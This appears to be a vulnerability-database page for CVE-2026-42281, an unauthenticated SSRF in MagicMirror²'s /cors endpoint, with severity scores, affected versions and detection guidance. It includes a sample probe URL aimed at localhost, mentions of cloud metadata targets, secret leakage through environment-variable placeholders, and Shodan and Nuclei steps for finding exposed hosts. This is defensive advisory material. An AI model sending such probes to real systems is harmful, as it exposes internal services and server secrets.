cbcvebase.
CVE-2026-42281
published 2026-05-14

CVE-2026-42281: MagicMirror² is an open source modular smart mirror platform. Prior to 2.36.0, an unauthenticated Server-Side Request Forgery (SSRF) vulnerability in the /cors…

PriorityP267high8.6CVSS 3.1
AVNACLPRNUINSCCHINAN
EXPLOIT
EPSS
1.62%
73.1th percentile
MagicMirror² is an open source modular smart mirror platform. Prior to 2.36.0, an unauthenticated Server-Side Request Forgery (SSRF) vulnerability in the /cors endpoint allows any remote attacker to force the MagicMirror² server to perform arbitrary HTTP requests to internal networks, cloud metadata services, and localhost services. The endpoint also expands environment variable placeholders (**VAR_NAME**), enabling exfiltration of server-side secrets. This vulnerability is fixed in 2.36.0.

Affected

2 ranges
VendorProductVersion rangeFixed in
magicmirrormagicmirror< 2.36.02.36.0
magicmirrororgmagicmirror< 2.36.02.36.0

Detection & IOCsextracted from sources · hover to see the quote

url/cors?url=http://127.0.0.1:8080/version
path/cors
sigma
detection: keywords: - '/cors?url=' condition: keywords
  • Detect unauthenticated GET requests to the /cors endpoint with a 'url' query parameter — this is the direct attack vector for SSRF exploitation.
  • Monitor for requests to /cors?url= targeting internal/loopback addresses (127.0.0.1, 169.254.169.254, 10.x, 172.16.x, 192.168.x) which indicate SSRF abuse against internal networks or cloud metadata services.
  • Watch for out-of-band DNS interactions triggered via /cors?url= with an external collaborator/interactsh URL, indicating blind SSRF probing.
  • The /cors endpoint expands environment variable placeholders in the format **VAR_NAME**, so monitor response bodies for patterns matching environment variable values (secrets, tokens) being returned to external requesters.
  • Use Shodan to identify exposed MagicMirror instances via the title fingerprint, then probe for the vulnerable /cors endpoint.
  • ·The vulnerability is unauthenticated — no credentials or session tokens are required to exploit the /cors endpoint, meaning any network-accessible MagicMirror instance is at risk.
  • ·The Nuclei template uses a two-step flow: first confirm the target is a MagicMirror instance (body contains 'MagicMirror'), then probe the /cors endpoint. Detection logic stops at first match between the localhost probe and the OOB DNS probe.
  • ·Affected versions are all releases prior to 2.36.0 (i.e., <= 2.35.0). The fix is exclusively in version 2.36.0 and later.

CVSS provenance

nvdv3.18.6HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
nvdv4.09.2CRITICALCVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.